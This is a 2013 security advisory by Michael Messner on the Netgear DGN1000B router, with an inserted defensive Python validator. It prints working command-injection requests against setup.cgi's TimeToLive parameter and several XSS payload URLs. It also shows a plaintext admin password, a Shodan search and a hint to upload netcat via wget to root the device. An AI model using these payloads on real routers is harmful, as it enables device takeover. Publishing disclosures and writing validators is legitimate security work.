Netgear DGN1000B XSS / Command Injection
Posted Feb 8, 2013
Authored by Michael Messner

The Netgear N150 Wireless ADSL2+ Modem Router DGN1000 suffers from cross-site scripting, OS command injection, and insecure cryptographic storage vulnerabilities. Firmware versions 1.1.00.24 and 1.1.00.45 are affected.

tags | exploit, vulnerability, xss
SHA-256 | dcec7c5cda6f10f1bbcd85f15e43d09cfdc1cbee7d31d660686584eb925c0e5c

Device Name: DGN1000B
Vendor: Netgear

============ Vulnerable Firmware Releases: ============

Firmware version: V1.1.00.24
Firmware version: V1.1.00.45

Download: http://downloadcenter.netgear.com/de/product/DGN1000

============ Device Description: ============

The N150 Wireless ADSL2+ Modem Router DGN1000 provides you with an easy and secure way to set up a wireless home network with fast access to the Internet over a high-speed digital subscriber line (DSL). The N150 Modem Router has a built-in DSL modem and is compatible with all major DSL Internet service providers. The security features let you block unsafe Internet content and applications, and protect the devices that you connect to your home network.

Source: http://support.netgear.com/product/DGN1000

============ Shodan Dorks ============

Shodan Search: NETGEAR DGN1000

============ Vulnerability Overview: ============

* OS Command Injection in the UPNP configuration:

The vulnerability is caused by missing input validation in the TimeToLive parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to upload and execute a backdoor to compromise the device.

Param: TimeToLive
POST /setup.cgi HTTP/1.1
Host: 192.168.178.188
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.188/setup.cgi?next_file=upnp.htm
Authorization: Basic XXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 185
Connection: close

UPnP=UPnP&AdverTime=30&TimeToLive=`%20COMMAND%20`&save=+Anwenden&todo=save&this_file=upnp.htm&next_file=upnp.htm&h_UPnP=enable&hiddenAdverTime=30&hiddenTimeToLive=4

Changing the request method from HTTP POST to HTTP GET works as well:

http://192.168.178.188/setup.cgi?UPnP=UPnP&AdverTime=30&TimeToLive=`%20COMMAND%20`&save=+Anwenden&todo=save&this_file=upnp.htm&next_file=upnp.htm&h_UPnP=enable&hiddenAdverTime=30&hiddenTimeToLive=4


It is possible to cross-compile Netcat, upload it via wget, adjust the permissions and execute it. Have phun ;)

Sources including needed toolchain: http://kb.netgear.com/app/answers/detail/a_id/2649
direct download: http://www.downloads.netgear.com/files/GPL/DGN1000B_VB1.00.45_GR_src.tar...

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN1000B-os-command-wget-check.png
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN1000B-r00ted.png

* Insecure Cryptographic Storage:

No password hashing is implemented, so the administrator password is stored in plain text on the system:
cat /tmp/etc/htpasswd
admin:password

* XSS

Injecting scripts into the following parameters shows that they are not properly validated for malicious input. Authentication is required, so another method of inserting the malicious JavaScript is needed for an unauthenticated attack.

-> Security -> Services -> Add new service -> Service name (German UI: Sicherheit -> Dienste -> neuen Dienst anlegen -> Dienstname)

Param: service_name

http://192.168.178.188/setup.cgi?service_name=%22%3E%3Cimg%20src=%220%22%20onerror=alert%282%29%3E&svc_type=tcp&serv_sport=1&serv_endport=2&save=Anwenden&todo=save&h_svc_type=tcp&edit=1&h_ruleSelect=0&this_file=servinfo.htm&next_file=fw_serv.htm

-> WLAN -> Edit access list -> Add -> Device name (German UI: WLAN -> Zugriffsliste anpassen -> Hinzufügen -> Gerätename)

Param: device

http://192.168.178.188/setup.cgi?accessLimit=accessLimit&device=%22%3E%3Cimg+src%3D%220%22+onerror=alert(2)>&wirelist_mac=01-11-22-33-44-66&h_accessLimit=enable&h_ruleSelect=0&todo=addmanual&this_file=m_access.htm&next_file=m_access.htm

Param: ssid_num

http://192.168.178.188/setup.cgi?next_file=adv_wireless.htm&ssid_num=a%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&flag=1

Param: h_skeyword

http://192.168.178.188/setup.cgi?skeyword=1&cfKeyWord_Domain=&KeyWordList=0&todo=delete&this_file=keyword.htm&next_file=keyword.htm&h_skeyword=115bcf%22%3E%3Cscript%3Ealert%281%29%3C/script%3Edc575b170bc38bebe&h_KeyWordList=&h_ruleSelect=0&h_trustipenable=disable&c4_Trusted_IPAddress=

Param: cfKeyWord_Domain

http://192.168.178.188/setup.cgi?skeyword=1&cfKeyWord_Domain=5d0a9%3Cscript%3Ealert%281%29%3C/script%3E&todo=addkeyword&this_file=keyword.htm&next_file=keyword.htm&h_skeyword=1&h_KeyWordList=&h_ruleSelect=&h_trustipenable=disable&c4_Trusted_IPAddress=
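As an added example (not part of the advisory or the vendor's firmware), a Python allowlist validator for the setup.cgi parameters named above: it shows the boundary input validation whose absence enables both the TimeToLive command injection and the XSS, run over constructed requests modelled on the proofs of concept. The integer ranges and character classes are assumptions, not values taken from the firmware.

```python
import re
from urllib.parse import parse_qsl

# Allowlist rules for the setup.cgi parameters named in the advisory.
# Integer fields are parsed and range-checked before use; free-text fields
# get a conservative character class, so backticks, quotes, angle brackets
# and other shell/HTML metacharacters are rejected at the boundary.
# The concrete ranges and character classes are assumptions, not values
# taken from the advisory or the firmware.
INT_RANGES = {"TimeToLive": (1, 255), "AdverTime": (1, 1440)}
TEXT_RULES = {
    "service_name": re.compile(r"[A-Za-z0-9 _.-]{1,32}"),
    "device": re.compile(r"[A-Za-z0-9 _.-]{1,32}"),
    "ssid_num": re.compile(r"[0-9]{1,2}"),
    "h_skeyword": re.compile(r"[01]"),
    "cfKeyWord_Domain": re.compile(r"[A-Za-z0-9.-]{0,64}"),
}

def validate_params(query):
    """Check one setup.cgi query string or POST body.

    Returns a list of (param, decoded_value, reason) rejections; an empty
    list means every covered parameter passed its allowlist.
    """
    rejections = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in INT_RANGES:
            lo, hi = INT_RANGES[name]
            # ASCII digits only, then a range check; anything else is rejected
            if not re.fullmatch(r"[0-9]{1,5}", value) or not lo <= int(value) <= hi:
                rejections.append((name, value, f"expected integer {lo}..{hi}"))
        elif name in TEXT_RULES and not TEXT_RULES[name].fullmatch(value):
            rejections.append((name, value, "disallowed characters"))
    return rejections

# Constructed samples modelled on the advisory's requests: a benign UPnP save,
# the TimeToLive command injection, and two of the XSS payloads.
SAMPLES = {
    "benign_upnp": "UPnP=UPnP&AdverTime=30&TimeToLive=4&save=+Anwenden&todo=save",
    "cmd_injection": "UPnP=UPnP&AdverTime=30&TimeToLive=`%20COMMAND%20`&save=+Anwenden&todo=save",
    "xss_service_name": "service_name=%22%3E%3Cimg%20src=%220%22%20onerror=alert%282%29%3E&svc_type=tcp",
    "xss_ssid_num": "next_file=adv_wireless.htm&ssid_num=a%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&flag=1",
}

def audit(samples=SAMPLES):
    """Map each sample label to the names of the parameters that failed validation."""
    return {label: [r[0] for r in validate_params(q)] for label, q in samples.items()}

if __name__ == "__main__":
    for label, failed in audit().items():
        print(f"{label:18s} -> {'rejected ' + ','.join(failed) if failed else 'accepted'}")
```

The same function can be run over logged setup.cgi request lines to flag attempts against unpatched devices, since the rejection reasons identify the offending parameter.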

============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-005
Twitter: @s3cur1ty_de

============ Time Line: ============

October 2012 - discovered vulnerability
15.10.2012 - Privately reported all details to vendor via email
23.10.2012 - Privately reported all details to vendor via webinterface
24.10.2012 - Netgear replied to forward the details internally
31.10.2012 - Netgear closes the case
31.10.2012 - Requested more details on why the case was closed
31.10.2012 - Netgear responded that they will check the state of the case
06.11.2012 - Netgear requested the Serial Number of the device
08.11.2012 - Responded with the Serial Number
13.11.2012 - Something was going on: I received a product registration confirmation
03.12.2012 - Case closed by Netgear - No new firmware available
16.01.2013 - Netgear contacted me again requesting to check a Beta version
22.01.2013 - Tested Beta Firmware and gave feedback to vendor
06.02.2013 - public release

===================== Advisory end =====================
